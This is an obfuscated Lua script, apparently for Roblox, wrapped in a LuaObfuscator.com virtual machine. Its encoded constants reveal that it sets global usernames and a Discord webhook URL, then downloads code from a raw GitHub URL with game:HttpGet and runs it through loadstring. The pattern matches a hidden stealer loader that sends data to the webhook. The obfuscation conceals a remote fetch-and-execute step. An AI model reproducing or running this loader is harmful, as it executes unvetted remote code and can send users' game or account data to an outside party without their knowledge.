--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=v2(v0(v30,16));if v19 then local v88=v5(v82,v19);v19=nil;return v88;else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=0 -0 ;local v84;while true do if (v83==(0 -0)) then v84=(v31/((3 -1)^(v32-(2 -1))))%((621 -(499 + 56 + 64))^(((v33-(932 -(857 + 74))) -(v32-((810 -241) -(367 + 201)))) + (928 -((1279 -(68 + 997)) + (1983 -(226 + 1044)))))) ;return v84-(v84%(1 + 0)) ;end end else local v85=(1 + 1)^(v32-(878 -(282 + 595))) ;return (((v31%(v85 + v85))>=v85) and 1) or ((7128 -5491) -(1523 + 114)) ;end end local function v21()local v34=957 -(892 + 65) ;local v35;while true do if (v34==(118 -(32 + 85))) then return v35;end if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + 1 + (350 -(87 + 263)) ;v34=1;end end end local function v22()local v36=180 -(67 + (303 -190)) ;local v37;local v38;while true do if (v36==(0 + 0)) then v37,v38=v1(v16,v18,v18 + (4 -2) );v18=v18 + 2 + 0 ;v36=3 -2 ;end if (v36==(1 -0)) then return (v38 * (1208 -(802 + 150))) + v37 ;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + 3 );v18=v18 + 3 + 1 ;return (v42 * ((22065741 -5287528) -(915 + 82))) + (v41 * (185570 -(121221 -(1069 + 118)))) + (v40 * (150 + (239 -133))) + v39 ;end local function v24()local v43=v23();local v44=v23();local v45=(1748 -(760 + 987)) -0 ;local v46=(v20(v44,1 + 0 ,(3071 -(1789 + 124)) -(116 + 1022) ) * ((3 -1)^(32 + 0))) + v43 ;local v47=v20(v44,(779 -(745 + 21)) + 8 ,113 -82 );local v48=((v20(v44,823 -(368 + 423) )==((2 + 1) -2)) and  -((51 -32) -(10 + 8))) or (3 -2) ;if (v47==(0 + (0 -0))) then if (v46==(885 -(261 + 624))) then return v48 * (442 -(416 + 1 + 25)) ;else v47=3 -2 ;v45=0;end elseif (v47==(879 + 1168)) then return ((v46==(0 -0)) and (v48 * ((439 -(145 + 293))/(430 -(44 + 386))))) or (v48 * NaN) ;end return v8(v48,v47-(804 + 219) ) * (v45 + (v46/((1488 -(998 + 488))^(17 + 35)))) ;end local function v25(v49)local v50=1055 -(87 + 968) ;local v51;local v52;while true do if (v50==(13 -10)) then return v6(v52);end if (v50==(1 + 0)) then v51=v3(v16,v18,(v18 + v49) -(2 -1) );v18=v18 + v49 ;v50=1415 -((1375 -928) + 966) ;end if (v50==(5 -3)) then v52={};for v89=1818 -(1703 + 114) , #v51 do v52[v89]=v2(v1(v3(v51,v89,v89)));end v50=704 -(376 + 325) ;end if (v50==(0 -(0 + 0))) then v51=nil;if  not v49 then v49=v23();if (v49==0) then return "";end end v50=1;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0 + 0 ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v53~=(0 -0)) then else v54=0 -0 ;v55=nil;v53=1;end if (v53~=(1703 -(1419 + 281))) then else v60=nil;while true do if (2==v54) then local v97=0;local v98;while true do if (v97==(0 -0)) then v98=0;while true do if (v98~=(75 -(71 + 3))) then else for v106=1,v23() do local v107=0;local v108;local v109;while true do if (v107~=(0 + 0)) then else v108=0;v109=nil;v107=1;end if (v107~=(2 -1)) then else while true do if (v108~=0) then else v109=v21();if (v20(v109,1,1 -0 )~=(241 -(187 + 54))) then else local v162=780 -(162 + 618) ;local v163;local v164;local v165;local v166;while true do if ((1 + 0)==v162) then v165=nil;v166=nil;v162=2 + 0 ;end if (v162==(3 -1)) then while true do if (v163==1) then local v167=0 -0 ;while true do if (v167==1) then v163=2;break;end if (v167~=(0 + 0)) then else v166={v22(),v22(),nil,nil};if (v164==0) then local v177=0 + 0 ;local v178;local v179;while true do if (1~=v177) then else while true do if (v178==0) then v179=0 -0 ;while true do if (v179==0) then v166[4 -1 ]=v22();v166[4]=v22();break;end end break;end end break;end if (v177==(1384 -(746 + 638))) then local v181=0;while true do if (v181~=1) then else v177=1 + 0 ;break;end if (v181==(0 -0)) then v178=341 -(218 + 123) ;v179=nil;v181=1582 -(1535 + 46) ;end end end end elseif (v164==(1 + 0)) then v166[3]=v23();elseif (v164==2) then v166[1 + 2 ]=v23() -((562 -(306 + 254))^(1 + 15)) ;elseif (v164==3) then local v183=0 -0 ;local v184;local v185;local v186;while true do if ((1468 -(899 + 568))==v183) then v186=nil;while true do if ((0 + 0)==v184) then v185=0 -0 ;v186=nil;v184=604 -(268 + 335) ;end if (v184==1) then while true do if (v185~=0) then else v186=0;while true do if (v186~=(290 -(60 + 230))) then else v166[3]=v23() -(2^(588 -(426 + 146))) ;v166[4]=v22();break;end end break;end end break;end end break;end if ((0 + 0)~=v183) then else v184=0;v185=nil;v183=1457 -(282 + 1174) ;end end end v167=812 -(569 + 242) ;end end end if (v163~=(8 -5)) then else if (v20(v165,3,1 + 2 )~=(1025 -(706 + 318))) then else v166[4]=v60[v166[1255 -(721 + 530) ]];end v55[v106]=v166;break;end if (v163~=0) then else local v169=0;local v170;while true do if ((1271 -(945 + 326))==v169) then v170=0 -0 ;while true do if ((1 + 0)~=v170) then else v163=1;break;end if (v170==(700 -(271 + 429))) then v164=v20(v109,2 + 0 ,1503 -(1408 + 92) );v165=v20(v109,1090 -(461 + 625) ,6);v170=1;end end break;end end end if (v163==(1290 -(993 + 295))) then if (v20(v165,1 + 0 ,1172 -(418 + 753) )==1) then v166[2]=v60[v166[1 + 1 ]];end if (v20(v165,2,2)~=(1 + 0)) then else v166[3]=v60[v166[3]];end v163=1 + 2 ;end end break;end if (v162==0) then v163=0 + 0 ;v164=nil;v162=1;end end end break;end end break;end end end v54=532 -(406 + 123) ;break;end if (v98==(1769 -(1749 + 20))) then for v110=1 + 0 ,v59 do local v111=1322 -(1249 + 73) ;local v112;local v113;local v114;while true do if (v111~=(0 + 0)) then else v112=0;v113=nil;v111=1146 -(466 + 679) ;end if (v111==(2 -1)) then v114=nil;while true do if (v112==(2 -1)) then if (v113==(1901 -(106 + 1794))) then v114=v21()~=0 ;elseif (v113==2) then v114=v24();elseif (v113==3) then v114=v25();end v60[v110]=v114;break;end if (v112==(0 + 0)) then v113=v21();v114=nil;v112=1 + 0 ;end end break;end end end v58[8 -5 ]=v21();v98=2 -1 ;end end break;end end end if (v54~=(117 -(4 + 110))) then else for v102=585 -(57 + 527) ,v23() do v56[v102-1 ]=v28();end return v58;end if (1==v54) then local v99=1427 -(41 + 1386) ;local v100;while true do if (0~=v99) then else v100=103 -(17 + 86) ;while true do if (v100~=0) then else local v105=0;while true do if (v105==0) then v58={v55,v56,nil,v57};v59=v23();v105=1;end if (v105==1) then v100=1;break;end end end if (v100==1) then v60={};v54=2;break;end end break;end end end if (v54==0) then local v101=0;while true do if ((167 -(122 + 44))==v101) then v57={};v54=1 -0 ;break;end if (v101==0) then v55={};v56={};v101=3 -2 ;end end end end break;end if (v53==(2 + 0)) then v58=nil;v59=nil;v53=3;end if (v53==1) then v56=nil;v57=nil;v53=2;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v86=0,v75 do if (v86>=v69) then v73[v86-v69 ]=v74[v86 + 1 ];else v77[v86]=v74[v86 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do local v87=0;while true do if (1==v87) then if (v80<=8) then if (v80<=3) then if (v80<=1) then if (v80>0) then local v115=v79[2];local v116,v117=v70(v77[v115](v13(v77,v115 + 1 ,v79[3])));v72=(v117 + v115) -1 ;local v118=0;for v143=v115,v72 do v118=v118 + 1 ;v77[v143]=v116[v118];end else v77[v79[2]][v79[3]]=v79[4];end elseif (v80>2) then v77[v79[2]]=v79[3]~=0 ;else local v122=v79[2];local v123=v77[v79[3]];v77[v122 + 1 ]=v123;v77[v122]=v123[v79[4]];end elseif (v80<=5) then if (v80>4) then local v127=v79[2];v77[v127]=v77[v127](v13(v77,v127 + 1 ,v72));else v77[v79[2]]();end elseif (v80<=6) then local v129=v79[2];v77[v129]=v77[v129](v13(v77,v129 + 1 ,v72));elseif (v80==7) then v77[v79[2]]();else v77[v79[2]]=v63[v79[3]];end elseif (v80<=12) then if (v80<=10) then if (v80==9) then local v131=0;local v132;local v133;while true do if (v131==0) then v132=v79[2];v133=v77[v79[3]];v131=1;end if (v131==1) then v77[v132 + 1 ]=v133;v77[v132]=v133[v79[4]];break;end end else do return;end end elseif (v80>11) then v77[v79[2]]=v79[3];else do return;end end elseif (v80<=14) then if (v80==13) then local v136=v79[2];local v137,v138=v70(v77[v136](v13(v77,v136 + 1 ,v79[3])));v72=(v138 + v136) -1 ;local v139=0;for v146=v136,v72 do local v147=0;while true do if (v147==0) then v139=v139 + 1 ;v77[v146]=v137[v139];break;end end end else v77[v79[2]][v79[3]]=v79[4];end elseif (v80<=15) then v77[v79[2]]=v79[3]~=0 ;elseif (v80==16) then v77[v79[2]]=v63[v79[3]];else v77[v79[2]]=v79[3];end v71=v71 + 1 ;break;end if (v87==0) then v79=v67[v71];v80=v79[1];v87=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0A3O0003023O005F4703083O00557365724E616D6503073O006970696E5F703403093O00557365724E616D653203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O3130312O363931323630353839322O36382F4F6E786F456C4C316B6633796C615A476A5F316E334750484D637357635A6F4439456C61687563524C68636A452D5461727335546935316B38785833344C53686F376A62030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A000F3O0012083O00013O00304O000200030012083O00013O00304O000400030012083O00013O00304O000500060012083O00073O001208000100083O0020020001000100090012110003000A4O000F000400014O000D000100044O00055O00022O00043O000100012O000B3O00017O00",v9(),...);end
